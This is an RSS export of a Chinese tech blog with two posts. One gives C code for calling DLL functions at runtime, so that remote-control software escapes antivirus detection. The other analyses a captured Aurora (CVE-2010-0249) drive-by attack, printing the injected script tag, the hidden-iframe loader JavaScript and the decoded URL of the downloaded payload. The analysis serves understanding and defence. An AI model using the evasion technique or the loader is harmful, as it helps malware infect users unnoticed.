<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>奋斗博客 &#187; 杀毒软件</title>
	<atom:link href="http://www.fendou.info/tag/%e6%9d%80%e6%af%92%e8%bd%af%e4%bb%b6/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fendou.info</link>
	<description>WordPress&#124;SEO&#124;Web&#124;Linux&#124;Windows&#124;Android</description>
	<lastBuildDate>Wed, 16 May 2012 07:29:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>VC 动态调用DLL导出函数例子</title>
		<link>http://www.fendou.info/vc-dll-dynamic-link-library-example/</link>
		<comments>http://www.fendou.info/vc-dll-dynamic-link-library-example/#comments</comments>
		<pubDate>Sun, 11 Apr 2010 14:40:20 +0000</pubDate>
		<dc:creator>dev</dc:creator>
				<category><![CDATA[段子]]></category>
		<category><![CDATA[VC]]></category>
		<category><![CDATA[动态调用]]></category>
		<category><![CDATA[导出函数]]></category>
		<category><![CDATA[杀毒软件]]></category>
		<category><![CDATA[源码]]></category>
		<category><![CDATA[远程控制]]></category>

		<guid isPermaLink="false">http://www.fendou.info/?p=933</guid>
		<description><![CDATA[最近研究了一份远程控制的源码，远程控制的软件通常会造杀毒软件的追杀，但是通过改写源代码可以躲避杀毒软件的查杀。一般的杀毒软件会通过定位文件的特征码来确定是不是病毒，这些特征码很容修改，而一些高启发式的杀毒软件会查杀远程控制软件的导出表，这就需要程序动态调用DLL导出函数。 <a href="http://www.fendou.info/vc-dll-dynamic-link-library-example/">继续阅读 <span class="meta-nav">&#8594;</span></a><table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="如何用手机远程控制电脑" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fhow-to-control-the-computer-remotely-using-a-mobile-phone%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/19/11100405.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">如何用手机远程控制电脑</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="极光(CVE-2010-0249)IE 0day漏洞 Shellcode" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9295919.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">极光(CVE-2010-0249)IE 0day漏洞 Shellcode</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="浏览器也能连接远程桌面" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fexplorer-remote-desktop%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11175202.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">浏览器也能连接远程桌面</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="Mysql弱口令取得系统权限" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fmysql-weak-password-get-system-right%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/19/11116029.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">Mysql弱口令取得系统权限</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="批处理开启远程桌面" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fopen-remote-desktop-in-cmd%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293850.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">批处理开启远程桌面</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p>最近研究了一份远程控制的源码，远程控制的软件通常会造杀毒软件的追杀，但是通过改写源代码可以躲避杀毒软件的查杀。</p>
<p>一般的杀毒软件会通过定位文件的特征码来确定是不是病毒，这些特征码很容修改，而一些高启发式的杀毒软件会查杀远程控制软件的导出表，这就需要程序动态调用DLL导出函数。</p>
<p>下面是两种动态调用DLL导出函数的方法，可以直接照猫画虎来动态调用各种DLL导出函数。</p>
<p>动态调用DLL函数对程序的运行没有任何影响，除了会增大程序的体积。通过Winhex等软件可以看到动态调用DLL导出函数的程序中的API函数都显示在字符串中。</p>
<p><span id="more-933"></span></p>

<div class="wp_syntax"><div class="code"><pre class="vc" style="font-family:monospace;">typedef UINT (WINAPI *GetSystemDirectoryAT)
&nbsp;
 (
	OUT LPSTR lpBuffer,
	IN UINT uSize
    );
GetSystemDirectoryAT pGetSystemDirectoryA= (GetSystemDirectoryAT)GetProcAddress(LoadLibrary(&quot;kernel32.dll&quot;),&quot;GetSystemDirectoryA&quot;);
&nbsp;
&nbsp;
&nbsp;
#ifdef UNICODE
#define API_GetSystemDirectory  GetSystemDirectoryW
#else
#define API_GetSystemDirectory  GetSystemDirectoryA
#endif // !UNICODE
&nbsp;
UINT API_GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
{
UINT result;
typedef UINT (WINAPI *lpAddFun)(LPSTR,UINT);
HINSTANCE hDll=LoadLibrary(&quot;kernel32.dll&quot;);
lpAddFun addFun=(lpAddFun)GetProcAddress(hDll,&quot;GetSystemDirectoryA&quot;);
if (addFun != NULL)
	{
	addFun(lpBuffer,uSize);	
	FreeLibrary(hDll);	
	}
return result;
}
&nbsp;
UINT API_GetSystemDirectoryW(LPSTR lpBuffer,UINT uSize)
{
UINT result;
typedef UINT (WINAPI *lpAddFun)(LPSTR,UINT);
HINSTANCE hDll=LoadLibrary(&quot;kernel32.dll&quot;);
lpAddFun addFun=(lpAddFun)GetProcAddress(hDll,&quot;GetSystemDirectoryW&quot;);
if (addFun != NULL)
	{
	addFun(lpBuffer,uSize);
	FreeLibrary(hDll);
	}
return result;
}</pre></div></div>

<table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="如何用手机远程控制电脑" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fhow-to-control-the-computer-remotely-using-a-mobile-phone%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/19/11100405.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">如何用手机远程控制电脑</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="极光(CVE-2010-0249)IE 0day漏洞 Shellcode" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9295919.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">极光(CVE-2010-0249)IE 0day漏洞 Shellcode</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="浏览器也能连接远程桌面" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fexplorer-remote-desktop%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/20/11175202.gif" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">浏览器也能连接远程桌面</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="Mysql弱口令取得系统权限" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fmysql-weak-password-get-system-right%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/11/19/11116029.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">Mysql弱口令取得系统权限</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="批处理开启远程桌面" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fopen-remote-desktop-in-cmd%2F&from=http%3A%2F%2Fwww.fendou.info%2Fvc-dll-dynamic-link-library-example%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293850.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">批处理开启远程桌面</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></content:encoded>
			<wfw:commentRss>http://www.fendou.info/vc-dll-dynamic-link-library-example/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>极光(CVE-2010-0249)IE 0day漏洞 Shellcode</title>
		<link>http://www.fendou.info/aurora-ie-0day-shellcode/</link>
		<comments>http://www.fendou.info/aurora-ie-0day-shellcode/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 06:11:03 +0000</pubDate>
		<dc:creator>dev</dc:creator>
				<category><![CDATA[网络技术]]></category>
		<category><![CDATA[CVE-2010-0249]]></category>
		<category><![CDATA[IE 0day]]></category>
		<category><![CDATA[shellcode]]></category>
		<category><![CDATA[杀毒软件]]></category>
		<category><![CDATA[极光]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.fendou.info/?p=870</guid>
		<description><![CDATA[在网络媒体报道极光漏洞第二天网上就有极光的Shellcode流出，我从一个被挂马的网站上也抓回一个，在自己机器上测试确实像传说中的一样“不弹，不卡”，就像当年的MS06014。但我在测试过程中发现我抓到的极光的Shellcode只有在IE6下才有效，跟网上报道的有很大出入，在没打补丁的IE7下测试都不能正常执行。 <a href="http://www.fendou.info/aurora-ie-0day-shellcode/">继续阅读 <span class="meta-nav">&#8594;</span></a><table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="极光漏洞 最新IE 0day漏洞" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fms-internet-explorer-aurora-exploit%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9294799.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">极光漏洞 最新IE 0day漏洞</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="火狐 Firefox 2010 必备附加组件" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Ffirefox-2010-extensions%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/17/9368840.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">火狐 Firefox 2010 必备附加组件</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="QQ2010 最新版本优先体验" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fqq2010-latest-version-of-the-first-to-experience%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293350.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">QQ2010 最新版本优先体验</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="2010大盘点《盛世狂欢》- Via AiZaoBao" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fnews%2Finventory-of-2010.html&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9292932.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">2010大盘点《盛世狂欢》- Via AiZaoBao</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="Web2.0时代搜索引擎该进化了" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fweb2-0-search-engine-evolution%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293018.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">Web2.0时代搜索引擎该进化了</font>
                    </a>
                </td>
        </tr>
    
    <tr>
        <td colspan="5" align="right">
            <a style="text-decoration: none !important;" href="http://www.wumii.com/widget/relatedItems" target="_blank" title="无觅相关文章插件">
                <font size="-1" color="#bbbbbb" style="display: block !important; font-family: arial !important; padding: 5px 0 !important; font-size: 12px !important; color: #bbb !important;">无觅</font>
            </a>
        </td>
    </tr>
</table>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.fendou.info/network/ms-internet-explorer-aurora-exploit.html">极光IE 0day漏洞</a>出来好多天了，各种杀毒软件公司极力宣传极光(CVE-2010-0249)IE 0day漏洞多么可怕，什么一打开网页就中招，什么被入侵电脑的游戏帐号可能被盗，银行帐号多么危险。我看这就是一个噱头，无非是骗骗菜鸟在电脑上安装个只占内存不杀毒的垃圾软件，自己的网站服务器都被挂马，还能指望它杀毒？！</p>
<p>在网络媒体报道极光漏洞第二天网上就有极光的Shellcode流出，我从一个被挂马的网站上也抓回一个，在自己机器上测试确实像传说中的一样“不弹，不卡”，就像当年的MS06014。但我在测试过程中发现我抓到的极光的Shellcode只有在IE6下才有效，跟网上报道的有很大出入，在没打补丁的IE7下测试都不能正常执行。</p>
<p>这几天也在关注什么网站被挂马，好第一时间抓个回来，希望能抓到那个被利用攻击谷歌的shellcode。之前公布的极光IE 0day(CVE-2010-0249) 测试 http://www.fendou.info/x/aurora/ 就是针对IE6的。给大家分析一下这马到底是怎么挂到网站上去的。<span id="more-870"></span></p>
<p><strong>首先是要入侵网站拿到网站的webshell</strong></p>
<p>拿到网站的额webshell后，就可以直接编辑网站的页面。</p>
<p><strong>在网页上插入挂马代码</strong></p>
<p>我抓到的挂马代码写的特别巧妙，很值得借鉴呢，看下面代码，模仿的谷歌广告代码调用的脚本地址，而且是调用的图片，如果不仔细看是看不出来的。只要在网页上插入这么一段代码，马挂上了。</p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;"><span style="color: #339933;">&lt;</span>script src<span style="color: #339933;">=</span>http<span style="color: #339933;">:</span><span style="color: #006600; font-style: italic;">//pagead2.googlesyndication.xx.xx/pagead/logo.gif&gt;&lt;/script&gt;</span></pre></div></div>

<p>这个图片地址空间是挂马者自己的租用的空间，域名模仿了一些知名网络服务的域名，目的就是让人不易察觉。下面看看这个logo.gif到底是什么东西。</p>
<p>下载回来用写字板打开这个图片文件(其实写字板能打开的文件类型很多哦)内如如下：</p>

<div class="wp_syntax"><div class="code"><pre class="javascript" style="font-family:monospace;"><span style="color: #003366; font-weight: bold;">function</span> Get<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
<span style="color: #003366; font-weight: bold;">function</span> Get<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
<span style="color: #003366; font-weight: bold;">var</span> Then <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">new</span> Date<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> 
Then.<span style="color: #660066;">setTime</span><span style="color: #009900;">&#40;</span>Then.<span style="color: #660066;">getTime</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">+</span> <span style="color: #CC0000;">24</span><span style="color: #339933;">*</span><span style="color: #CC0000;">60</span><span style="color: #339933;">*</span><span style="color: #CC0000;">60</span><span style="color: #339933;">*</span><span style="color: #CC0000;">1000</span><span style="color: #009900;">&#41;</span>
<span style="color: #003366; font-weight: bold;">var</span> cookieString <span style="color: #339933;">=</span> <span style="color: #003366; font-weight: bold;">new</span> String<span style="color: #009900;">&#40;</span>document.<span style="color: #660066;">cookie</span><span style="color: #009900;">&#41;</span>
<span style="color: #003366; font-weight: bold;">var</span> cookieHeader <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;Cookie1=&quot;</span> 
<span style="color: #003366; font-weight: bold;">var</span> beginPosition <span style="color: #339933;">=</span> cookieString.<span style="color: #660066;">indexOf</span><span style="color: #009900;">&#40;</span>cookieHeader<span style="color: #009900;">&#41;</span>
<span style="color: #000066; font-weight: bold;">if</span> <span style="color: #009900;">&#40;</span>beginPosition <span style="color: #339933;">!=</span> <span style="color: #339933;">-</span><span style="color: #CC0000;">1</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> 
<span style="color: #009900;">&#125;</span> <span style="color: #000066; font-weight: bold;">else</span> 
<span style="color: #009900;">&#123;</span> 
document.<span style="color: #660066;">cookie</span> <span style="color: #339933;">=</span> <span style="color: #3366CC;">&quot;Cookie1=risb;expires=&quot;</span><span style="color: #339933;">+</span> Then.<span style="color: #660066;">toGMTString</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span>
document.<span style="color: #660066;">writeln</span><span style="color: #009900;">&#40;</span><span style="color: #3366CC;">&quot;&lt;iframe src=http://pagead2.googlesyndication.xx.xx/pagead/aurora.htm width=0 height=0&gt;&lt;/iframe&gt;&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #009900;">&#125;</span>Get<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>挂马者考虑的还很全面居然写了cookies防止重复中马。其中iframe调用的就是极光的shellcode了。<a href="http://www.fendou.info/x/aurora/aurora.txt" target="_blank">查看代码</a></p>
<p>我在这段代码中加了一行防止杀毒软件“误杀” Shellcode最终下载并运行的东西存在var u=swyice里面，十六进制转换加密的。用UE就能查看原来的内容内容%u7468%u7074 ->74 68 70 74 ->thpt ->http 看到这儿就能看出Shellcode执行的文件的地址是存在这里的，全部解开后就是：</p>
<p>http://pagead2.googlesyndication.xx.xx/pagead/1.exe</p>
<p>这个1.exe就是最终要在电脑中运行的文件。</p>
<p>后记：<br />
1.极光(CVE-2010-0249)IE 0day漏洞 Shellcode <a href="http://www.fendou.info/x/aurora/shellcode.htm" target="_blank">解密工具</a><br />
2.IE漏洞实在太多，建议换FireFox浏览器或者其他非IE核心的浏览器。<br />
3.杀毒软件不是万能的，别以为装个杀毒软件就什么网站都上。</p>
<table class="wumii-related-items" cellspacing="0" cellpadding="3" border="0"  style="clear: both;">
    
    <tr>
        <td colspan="5"><b><font size="-1"  style="display: block !important; padding: 20px 0 5px !important;"></font></b></td>
    </tr>
    
        <tr>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important;">
                    <a target="_blank" title="极光漏洞 最新IE 0day漏洞" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fms-internet-explorer-aurora-exploit%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9294799.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">极光漏洞 最新IE 0day漏洞</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="火狐 Firefox 2010 必备附加组件" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Ffirefox-2010-extensions%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/17/9368840.png" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">火狐 Firefox 2010 必备附加组件</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="QQ2010 最新版本优先体验" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fqq2010-latest-version-of-the-first-to-experience%2F&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9293350.jpg" width="105px" height="105px" /><br />
                        <font size="-1" color="#333333" style="display: block !important; line-height: 15px !important; width: 111px !important; font: 12px/15px arial !important; height: 45px !important; margin: 3px 0 0 0 !important; padding: 0 !important; overflow: hidden !important;">QQ2010 最新版本优先体验</font>
                    </a>
                </td>
                <td width="111" valign="top" style="padding: 5px !important; margin: 0 !important; border-left: 1px solid #DDDDDD !important;">
                    <a target="_blank" title="2010大盘点《盛世狂欢》- Via AiZaoBao" style="text-decoration: none !important; cursor: pointer !important;" href="http://app.wumii.com/ext/redirect?url=http%3A%2F%2Fwww.fendou.info%2Fnews%2Finventory-of-2010.html&from=http%3A%2F%2Fwww.fendou.info%2Faurora-ie-0day-shellcode%2F">
                        <img style="margin: 0 !important; padding: 2px !important; border: 1px solid #DDDDDD !important; width: 105px !important; height: 105px !important;" src="http://static.wumii.com/site_images/2011/10/16/9292932.jpg" width="105px" height="105px" /><br />
